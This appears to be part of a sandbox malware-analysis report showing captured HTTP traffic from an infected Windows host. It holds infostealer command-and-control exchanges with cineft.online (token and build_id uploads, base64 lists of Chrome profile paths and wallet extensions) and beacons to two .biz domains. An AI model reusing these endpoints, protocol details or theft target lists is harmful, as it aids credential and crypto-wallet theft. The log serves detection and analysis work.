2024-12-14 22:59:30 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 22:59:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 22:59:30 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 32 33 32 61 30 30 65 33 39 32 64 34 33 38 33 66 61 66 30 31 35 35 36 62 39 62 65 65 62 66 38 32 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|232a00e392d4383faf01556b9beebf82\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.4	50040	116.203.12.241	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:59:32 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----OZMG479H4EUAAI5F3ECJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: cineft.online Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 22:59:32 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 5a 4d 47 34 37 39 48 34 45 55 41 41 49 35 46 33 45 43 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 32 61 30 30 65 33 39 32 64 34 33 38 33 66 61 66 30 31 35 35 36 62 39 62 65 65 62 66 38 32 0d 0a 2d 2d 2d 2d 2d 2d 4f 5a 4d 47 34 37 39 48 34 45 55 41 41 49 35 46 33 45 43 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4f 5a 4d 47 34 37 39 48 34 45 55 41 41 49 35 46 33 45 43 4a 0d 0a 43 6f 6e 74 Data Ascii: ------OZMG479H4EUAAI5F3ECJContent-Disposition: form-data; name="token"232a00e392d4383faf01556b9beebf82------OZMG479H4EUAAI5F3ECJContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------OZMG479H4EUAAI5F3ECJCont
2024-12-14 22:59:32 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 22:59:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 22:59:32 UTC	2192	IN	Data Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.4	50050	116.203.12.241	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:59:34 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----0RQI5FKFUSJMYU379R90 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: cineft.online Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 22:59:34 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 30 52 51 49 35 46 4b 46 55 53 4a 4d 59 55 33 37 39 52 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 32 61 30 30 65 33 39 32 64 34 33 38 33 66 61 66 30 31 35 35 36 62 39 62 65 65 62 66 38 32 0d 0a 2d 2d 2d 2d 2d 2d 30 52 51 49 35 46 4b 46 55 53 4a 4d 59 55 33 37 39 52 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 30 52 51 49 35 46 4b 46 55 53 4a 4d 59 55 33 37 39 52 39 30 0d 0a 43 6f 6e 74 Data Ascii: ------0RQI5FKFUSJMYU379R90Content-Disposition: form-data; name="token"232a00e392d4383faf01556b9beebf82------0RQI5FKFUSJMYU379R90Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------0RQI5FKFUSJMYU379R90Cont
2024-12-14 22:59:35 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 22:59:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 22:59:35 UTC	5837	IN	Data Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.4	50056	116.203.12.241	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:59:36 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ASR16FCT00ZMYMO8GV3O User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: cineft.online Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 22:59:36 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 53 52 31 36 46 43 54 30 30 5a 4d 59 4d 4f 38 47 56 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 32 61 30 30 65 33 39 32 64 34 33 38 33 66 61 66 30 31 35 35 36 62 39 62 65 65 62 66 38 32 0d 0a 2d 2d 2d 2d 2d 2d 41 53 52 31 36 46 43 54 30 30 5a 4d 59 4d 4f 38 47 56 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 41 53 52 31 36 46 43 54 30 30 5a 4d 59 4d 4f 38 47 56 33 4f 0d 0a 43 6f 6e 74 Data Ascii: ------ASR16FCT00ZMYMO8GV3OContent-Disposition: form-data; name="token"232a00e392d4383faf01556b9beebf82------ASR16FCT00ZMYMO8GV3OContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------ASR16FCT00ZMYMO8GV3OCont
2024-12-14 22:59:37 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 22:59:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 22:59:37 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.4	50064	116.203.12.241	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:59:39 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----N7QIMYUSJMYUAIWLN79Z User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: cineft.online Content-Length: 6941 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 22:59:39 UTC	6941	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4e 37 51 49 4d 59 55 53 4a 4d 59 55 41 49 57 4c 4e 37 39 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 32 61 30 30 65 33 39 32 64 34 33 38 33 66 61 66 30 31 35 35 36 62 39 62 65 65 62 66 38 32 0d 0a 2d 2d 2d 2d 2d 2d 4e 37 51 49 4d 59 55 53 4a 4d 59 55 41 49 57 4c 4e 37 39 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4e 37 51 49 4d 59 55 53 4a 4d 59 55 41 49 57 4c 4e 37 39 5a 0d 0a 43 6f 6e 74 Data Ascii: ------N7QIMYUSJMYUAIWLN79ZContent-Disposition: form-data; name="token"232a00e392d4383faf01556b9beebf82------N7QIMYUSJMYUAIWLN79ZContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------N7QIMYUSJMYUAIWLN79ZCont
2024-12-14 22:59:40 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 22:59:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 22:59:40 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.4	50065	104.21.51.88	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:59:39 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: shineugler.biz
2024-12-14 22:59:39 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-14 22:59:40 UTC	1018	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:59:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=b197hji2dqjlegjqvce87o779t; expires=Wed, 09-Apr-2025 16:46:18 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dKki2Ida8tk%2B1%2FrVPwOq%2BVZ9M0oQFPmnWBYoqZMMNSEg8Biq7JS1UTnWYhGrYfG2yRtyPqP5gmJ1%2FXxlZM9q50q0UvLZ%2FGSscdeJcxAbHjlKkuxslts027siEHGCY%2BYVMg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f21ce3cedc841d3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1664&min_rtt=1602&rtt_var=726&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=905&delivery_rate=1388492&cwnd=32&unsent_bytes=0&cid=4f375f8ebf850b5a&ts=763&x=0"
2024-12-14 22:59:40 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-14 22:59:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.4	50069	116.203.12.241	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:59:40 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HLNY58Q9RQIE3E3OP8QI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: cineft.online Content-Length: 489 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 22:59:40 UTC	489	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 4c 4e 59 35 38 51 39 52 51 49 45 33 45 33 4f 50 38 51 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 32 61 30 30 65 33 39 32 64 34 33 38 33 66 61 66 30 31 35 35 36 62 39 62 65 65 62 66 38 32 0d 0a 2d 2d 2d 2d 2d 2d 48 4c 4e 59 35 38 51 39 52 51 49 45 33 45 33 4f 50 38 51 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 48 4c 4e 59 35 38 51 39 52 51 49 45 33 45 33 4f 50 38 51 49 0d 0a 43 6f 6e 74 Data Ascii: ------HLNY58Q9RQIE3E3OP8QIContent-Disposition: form-data; name="token"232a00e392d4383faf01556b9beebf82------HLNY58Q9RQIE3E3OP8QIContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------HLNY58Q9RQIE3E3OP8QICont
2024-12-14 22:59:41 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 22:59:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 22:59:41 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.4	50077	104.21.22.222	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:59:41 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: immureprech.biz
2024-12-14 22:59:41 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-14 22:59:42 UTC	1017	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:59:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=n09dp1cgnrhttt0tmj8t615aha; expires=Wed, 09-Apr-2025 16:46:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eq12Rm40iPK8rYaT0oUfwYTqoYZOKvzfIeJRWuJgQ0S%2BUi4n2l3qMnBg2KnwJp02jD16sAnItLPxkn2KEzanHg60EcnGC0%2BlXd%2FsLV0b8DojMlgafd%2B%2Fw6%2BsWt3yjKS6Pb0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f21ce49580c0f70-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1513&min_rtt=1511&rtt_var=572&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=906&delivery_rate=1903520&cwnd=197&unsent_bytes=0&cid=6594ee09c688a294&ts=700&x=0"
2024-12-14 22:59:42 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-14 22:59:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.4	50092	172.217.19.228	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:59:42 UTC	607	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-14 22:59:43 UTC	1266	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:59:43 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-VLSNi7zsd9FYftz_cMXF7Q' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-14 22:59:43 UTC	124	IN	Data Raw: 33 33 35 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 70 61 72 6b 6d 6f 62 69 6c 65 20 64 61 74 61 20 62 72 65 61 63 68 20 73 65 74 74 6c 65 6d 65 6e 74 22 2c 22 6d 6f 6e 6f 70 6f 6c 79 20 67 6f 20 68 61 75 6e 74 65 64 20 6d 61 6e 73 69 6f 6e 20 72 65 77 61 72 64 73 22 2c 22 72 6f 6c 6c 69 6e 67 20 6c 6f 75 64 20 6d 69 61 6d 69 20 6c 69 76 65 73 74 72 65 61 6d 22 2c 22 67 75 Data Ascii: 335)]}'["",["parkmobile data breach settlement","monopoly go haunted mansion rewards","rolling loud miami livestream","gu
2024-12-14 22:59:43 UTC	704	IN	Data Raw: 6b 65 73 68 20 77 6f 72 6c 64 20 63 68 65 73 73 20 63 68 61 6d 70 69 6f 6e 73 68 69 70 22 2c 22 66 75 6c 6c 20 6d 6f 6f 6e 20 64 65 63 65 6d 62 65 72 20 32 30 32 34 20 63 6f 6c 64 20 6d 6f 6f 6e 22 2c 22 69 63 65 20 73 74 6f 72 6d 20 77 61 72 6e 69 6e 67 20 69 6f 77 61 22 2c 22 73 6f 75 6e 64 68 6f 75 6e 64 20 61 69 20 73 74 6f 63 6b 73 22 2c 22 6f 6e 65 20 70 75 6e 63 68 20 6d 61 6e 20 73 65 61 73 6f 6e 20 33 20 72 65 6c 65 61 73 65 20 64 61 74 65 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 Data Ascii: kesh world chess championship","full moon december 2024 cold moon","ice storm warning iowa","soundhound ai stocks","one punch man season 3 release date"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgI
2024-12-14 22:59:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.4	50089	172.217.19.228	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:59:42 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.4	50091	172.217.19.228	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:59:42 UTC	510	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-14 22:59:43 UTC	1018	IN	HTTP/1.1 200 OK Version: 704583840 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sat, 14 Dec 2024 22:59:43 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-14 22:59:43 UTC	372	IN	Data Raw: 31 30 66 61 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 10fa)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d 